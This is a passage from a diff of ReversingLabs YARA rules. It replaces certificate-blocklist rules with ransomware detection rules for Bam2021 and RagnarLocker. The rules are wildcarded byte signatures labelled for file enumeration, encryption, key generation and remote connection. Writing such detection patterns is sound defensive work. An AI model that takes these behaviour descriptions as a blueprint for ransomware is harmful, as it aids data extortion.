+            15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D8 6A ?? 89 5C 24 ?? FF 15 ??
+            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 50
+            FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA
+            ?? ?? ?? ?? C1 E8 ?? 50 E8 ?? ?? ?? ?? 59 8D 94 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 85 C9 75 ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ??
+            50 FF 15
+        }
+		$find_files = {
+            53 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 35 ?? ?? ?? ?? FF D6 83 C4 ?? 53 8D 85 ??
+            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF D6 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 85 F6 0F 84 ?? ??
+            ?? ?? 33 DB B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ??
+            66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 8B C3 EB ?? 1B C0 83
+            C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75
+            ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 8B
+            C3 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ??
+            F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 59 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3
+            A5 6A ?? 59 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 66 A5 6A ?? 59 BE ?? ?? ?? ?? 8D
+            BD ?? ?? ?? ?? F3 A5 66 A5 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? A5 A5 A5 A5 50 E8 ?? ??
+            ?? ?? 59 8B F0 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ??
+            ?? ?? 50 56 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ??
+            59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? FF 75 ??
+            8B 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 75 ?? E9 ?? ?? ?? ?? FF 75 ?? E9 ??
+            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 66 39 1F 0F 84
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Komp.IT" and ( pe.signatures [ i ] . serial == "00:1e:cd:82:9a:dc:c5:5d:9d:6a:fe:30:dc:37:1e:bd:a6" or pe.signatures [ i ] . serial == "1e:cd:82:9a:dc:c5:5d:9d:6a:fe:30:dc:37:1e:bd:a6" ) and 1588723200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_B0167124Ca59149E64D292Eb4B142014 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Bam2021 : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Bam2021 ransomware."
 		author = "ReversingLabs"
-		id = "384ce73e-3ad5-54d9-a140-cb242f9a91e6"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "31ae99e3-223c-51fb-97c1-353ff063057f"
+		date = "2021-09-17"
+		modified = "2021-09-17"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4422-L4440"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Bam2021.yara#L1-L167"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "10d980d4a71dab4679376f5a6d6a6999e0b59af4f25587a7b8d1ef52a7808cc9"
+		logic_hash = "5b717510991b78f07806e88f3dfe1c27d6ec1ec21af61a7c4f1edf7c915785d5"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Bam2021"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$enum_shares = {
+            83 EC ?? 53 55 8B 2D ?? ?? ?? ?? 56 57 68 ?? ?? ?? ?? FF D5 8B 74 24 ?? 6A ?? 56 C7
+            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4C 24
+            ?? 8D 44 24 ?? 50 51 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 89 06 33 C0 5F 5E
+            5D 5B 83 C4 ?? C2 ?? ?? 8B 54 24 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8B F8 89 7C 24 ?? 85
+            FF 75 ?? 89 06 8B 44 24 ?? 50 6A ?? 57 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 8D 4C 24
+            ?? 51 57 8D 54 24 ?? 52 50 E8 ?? ?? ?? ?? 8B F0 85 F6 0F 85 ?? ?? ?? ?? 33 DB 39 5C
+            24 ?? 76 ?? 8D 77 ?? 90 33 C0 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44
+            24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 8B 06 50 C7 44 24 ?? ?? ?? ?? ?? 89 44 24
+            ?? FF D5 6A ?? 6A ?? 6A ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 3E E8 ?? ??
+            ?? ?? 8B 7C 24 ?? 8B 54 24 ?? 6A ?? 6A ?? 52 E8 ?? ?? ?? ?? 8B 46 ?? 83 E0 ?? 3C ??
+            75 ?? 8B 4C 24 ?? 8B 44 24 ?? 51 8D 56 ?? 52 50 E8 ?? ?? ?? ?? 43 83 C6 ?? 3B 5C 24
+            ?? 0F 82 ?? ?? ?? ?? E9 ?? ?? ?? ?? 81 FE ?? ?? ?? ?? 74 ?? 56 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 89 31 57 FF 15 ?? ?? ?? ?? 8B 54 24 ?? 52 E8 ?? ?? ??
+            ?? 8B F0 85 F6 74 ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 89 30 33
+            C0 5F 5E 5D 5B 83 C4 ?? C2
+        }
+		$find_files_p1 = {
+            8D 94 24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8
+            ?? 0F 84 ?? ?? ?? ?? 8B 7C 24 ?? EB ?? 8D A4 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 84 24
+            ?? ?? ?? ?? 8D 64 24 ?? 66 8B 10 66 3B 11 75 ?? 66 3B D5 74 ?? 66 8B 50 ?? 66 3B 51
+            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D5 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C5 0F 84 ??
+            ?? ?? ?? B9 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 90 66 8B 10 66 3B 11 75 ?? 66 3B D5 74
+            ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D5 75 ?? 33 C0 EB ?? 1B C0
+            83 D8 ?? 3B C5 0F 84 ?? ?? ?? ?? F6 84 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 8C 24
+            ?? ?? ?? ?? 51 BB ?? ?? ?? ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 9C 24 ?? ??
+            ?? ?? 8D 74 24 ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 55 8D 8C 24
+            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? 8B 54 24 ??
+            52 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C6 84 24 ?? ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? 66 89 44 24 ?? 72 ?? 8B 4C 24 ?? 51 E8 ?? ?? ?? ??
+            83 C4 ?? 8B 54 24 ?? 8B 44 24 ?? 42 3B C2 77 ?? 8D 5C 24 ?? E8 ?? ?? ?? ?? 8B 44 24
+            ?? 8B 4C 24 ?? 8B 54 24 ?? 8D 34 0A 3B C6 77 ?? 2B F0 8B 44 24 ?? 39 2C B0 75 ?? 6A
+            ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 89 04 B1 8B 54 24 ?? 8B 0C B2 89 4C 24 ?? 89
+        }
+		$find_files_p2 = {
+            4C 24 ?? C6 84 24 ?? ?? ?? ?? ?? 3B CD 74 ?? 33 C0 C7 41 ?? ?? ?? ?? ?? 89 69 ?? 6A
+            ?? 66 89 41 ?? 55 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? FF 44
+            24 ?? E9 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 73 ?? 8D 84 24 ??
+            ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 50 68 ?? ?? ?? ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 47 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ??
+            ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? BE ?? ?? ?? ?? 8B 16 52 8D 84 24 ??
+            ?? ?? ?? 50 FF D3 85 C0 75 ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 7C ?? E9 ?? ?? ?? ?? 57 8D
+            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C0 ?? 8D 94 24 ?? ?? ?? ?? 2B D0 0F
+            B7 08 66 89 0C 02 83 C0 ?? 66 3B CD 75 ?? 33 C0 EB ?? 8D A4 24 ?? ?? ?? ?? 8D 49 ??
+            0F B7 8C 04 ?? ?? ?? ?? 66 89 8C 04 ?? ?? ?? ?? 83 C0 ?? 66 3B CD 75 ?? 33 C0 8D 9B
+            ?? ?? ?? ?? 0F B7 88 ?? ?? ?? ?? 66 89 8C 04 ?? ?? ?? ?? 83 C0 ?? 66 3B CD 75 ?? 8B
+            5C 24 ?? 6A ?? B9 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 8D 8C
+            24 ?? ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 50 FF 15
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 83 E4 ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ??
+            ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 84 24 ?? ??
+            ?? ?? 64 A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 DB 3B C3 75 ?? 6A ?? E8 ?? ?? ?? ?? 8B F0
+            83 C4 ?? 3B F3 74 ?? 68 ?? ?? ?? ?? 8D 46 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B C6
+            EB ?? 33 C0 A3 ?? ?? ?? ?? 8D 4C 24 ?? 51 8B F8 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84
+            24 ?? ?? ?? ?? 33 D2 53 89 9C 24 ?? ?? ?? ?? 50 66 89 94 24 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 33 C9 53 52 66 89 8C 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 33 C0 53 51 66 89 84 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 33 D2 53 50 66 89 54
+            24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 33 C9 53 52 66 89
+            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 47 ?? 83 C4 ?? 50 89 5C 24 ?? 89 44 24 ?? E8 ??
+            ?? ?? ?? 53 53 8D 84 24 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 EC ?? 8B
+        }
+		$encrypt_files_p2 = {
+            F4 33 C9 8D 84 24 ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 89 5E ?? 89 64 24 ?? 66 89 4E ??
+            8D 50 ?? 90 66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B C2 D1 F8 50 8D 84 24 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 6A ?? 8D 94 24 ?? ?? ?? ?? 52 53 FF 15 ?? ?? ?? ??
+            85 C0 74 ?? 83 EC ?? 8B F4 33 C0 C7 46 ?? ?? ?? ?? ?? 89 5E ?? 66 89 46 ?? 8D 84 24
+            ?? ?? ?? ?? 89 64 24 ?? 8D 50 ?? EB ?? 8D 49 ?? 66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B
+            C2 D1 F8 50 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 6A ?? 8D 8C 24
+            ?? ?? ?? ?? 51 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 EC ?? 8B F4 33 D2 C7 46 ?? ?? ??
+            ?? ?? 89 5E ?? 8D 84 24 ?? ?? ?? ?? 66 89 56 ?? 89 64 24 ?? 8D 50 ?? EB ?? 8D 49 ??
+            66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B C2 D1 F8 50 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            57 E8 ?? ?? ?? ?? 53 6A ?? 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ??
+            ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 EC ?? 8B F4 33 D2 C7 46 ?? ??
+            ?? ?? ?? 89 5E ?? 8D 44 24 ?? 66 89 56 ?? 89 64 24 ?? 8D 50 ?? 8D A4 24 ?? ?? ?? ??
+            66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B C2 D1 F8 50 8D 44 24 ?? E8 ?? ?? ?? ?? 57 E8 ??
+            ?? ?? ?? 53 6A ?? 8D 84 24 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ??
+            ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 EC ?? 8B F4 33 D2 C7
+        }
+		$encrypt_files_p3 = {
+            46 ?? ?? ?? ?? ?? 89 5E ?? 8D 84 24 ?? ?? ?? ?? 66 89 56 ?? 89 64 24 ?? 8D 50 ?? 90
+            66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B C2 D1 F8 50 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            57 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8D 44 24 ?? 50 53 6A ?? 53 53 53 68 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 89 5C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4C 24 ?? 51 FF 15 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B F8 53
+            57 E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8D 54
+            24 ?? 52 57 8B CE E8 ?? ?? ?? ?? 8B 74 24 ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 74 24 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 8B 8C 24 ?? ?? ?? ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 8C 24 ??
+            ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$generate_key = {
+            50 C7 44 24 ?? ?? ?? ?? ?? F3 A5 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ?? ?? ??
+            ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 8B 44 24 ?? 8D 4C 24 ?? 51
+            6A ?? 6A ?? 6A ?? 8D 54 24 ?? 52 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ?? ??
+            ?? ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 8B 54 24 ?? 6A ?? 8D 4C
+            24 ?? 51 6A ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ?? ?? ?? ?? 5B 8B 4C 24
+            ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 8B 54 24 ?? 6A ?? 8D 44 24 ?? 50 8D 4C 24
+            ?? 51 6A ?? 52 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ??
+            ?? ?? ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 8B 44 24 ?? C1 E8 ??
+            89 44 24 ?? 03 C3 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 5F 5E 5D B8 ?? ?? ??
+            ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 53 55 56 E8 ?? ?? ?? ?? 8B
+            4C 24 ?? 83 C4 ?? 89 5C 24 ?? 83 C3 ?? 53 8D 44 24 ?? 50 56 6A ?? 6A ?? 6A ?? 51 FF
+            15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ?? ?? ?? ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ??
+            ?? 83 C4 ?? C2 ?? ?? 8B 7C 24 ?? 8B 54 24 ?? 57 56 52 E8 ?? ?? ?? ?? 8B 44 24 ?? 56
+            89 38 E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 5F 5E 5D 5B 33 CC 33 C0 E8 ?? ?? ?? ?? 83
+            C4 ?? C2
+        }
+		$remote_connection = {
+            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 57 8D 44 24 ?? 50 68 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 46 ?? 83
+            F8 ?? 74 ?? 8B 46 ?? 8D 7E ?? 83 E8 ?? 83 78 ?? ?? 7E ?? 8B 48 ?? 51 8B CF E8 ?? ??
+            ?? ?? 8B 3F 57 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 54 24 ?? 52 89 44 24 ?? FF 15 ?? ??
+            ?? ?? 85 C0 75 ?? 8B 46 ?? 50 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 C0 5F 8B 8C 24
+            ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 8B 48 ?? 8B 11 8B 02 0F B7 56
+            ?? B9 ?? ?? ?? ?? 52 89 44 24 ?? 66 89 4C 24 ?? FF 15 ?? ?? ?? ?? 8B 4E ?? 66 89 44
+            24 ?? 6A ?? 8D 44 24 ?? 50 51 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? FF 15 ?? ?? ?? ?? 8B
+            56 ?? 52 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 C0 5F 8B 8C 24 ?? ?? ?? ?? 33 CC E8
+            ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 8B 8C 24 ?? ?? ?? ?? 5F 33 CC B8 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Euro May SP Z O O" and ( pe.signatures [ i ] . serial == "00:b0:16:71:24:ca:59:14:9e:64:d2:92:eb:4b:14:20:14" or pe.signatures [ i ] . serial == "b0:16:71:24:ca:59:14:9e:64:d2:92:eb:4b:14:20:14" ) and 1585267200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_shares ) and ( all of ( $find_files_p* ) ) and ( $generate_key ) and ( all of ( $encrypt_files_p* ) ) and ( $remote_connection )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_112613B7B5F696Cf377680F6463Fcc8C : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Ragnarlocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects RagnarLocker ransomware."
 		author = "ReversingLabs"
-		id = "c0015521-b163-51ab-8c27-da3b1a8df084"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "3bc3765a-f1f8-59bc-bbe8-6821654b334f"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4442-L4458"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.RagnarLocker.yara#L1-L108"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "50fd35617e059a5fe9d9e0fdb4b880c20e406357bbb2d037f9e6e9db47b8e49f"
+		logic_hash = "398f0e5e003f87edf90cdea718be6b10470df317214d00db4dc6c4cccc5b6748"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "RagnarLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 33 C0 B9 ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 8B 75 ?? 57
+            8D BD ?? ?? ?? ?? F3 AB 8B 3D ?? ?? ?? ?? 39 45 ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 8D
+            85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75
+            ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF D3
+        }
+		$find_files_p2 = {
+            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
+            ?? 83 FB ?? 75 ?? C7 45 ?? ?? ?? ?? ?? 33 F6 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? FF 74 B5 ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ??
+            ?? 46 83 FE ?? 7C ?? 33 C0 85 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50
+            68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            50 FF 75 ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
+            FF D6 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 FF D6 6A ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF D6 6A ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
+            ?? ?? 8B 45 ?? 8B 1D ?? ?? ?? ?? 8B 75 ?? 50 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            56 FF D3
+        }
+		$find_files_p3 = {
+            33 F6 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 90 FF 74 B5 ??
+            53 FF D7 85 C0 74 ?? 46 83 FE ?? 72 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            8B 45 ?? 8B 75 ?? 8D 8D ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? E9
+            ?? ?? ?? ?? 5F 5E 32 C0 5B 8B E5 5D C3 FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E B0 ?? 5B 8B
+            E5 5D C3
+        }
+		$encrypt_files_p1 = {
+            56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            83 C4 ?? 68 ?? ?? ?? ?? 50 FF D7 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D7 56 8B 35 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 8D 85
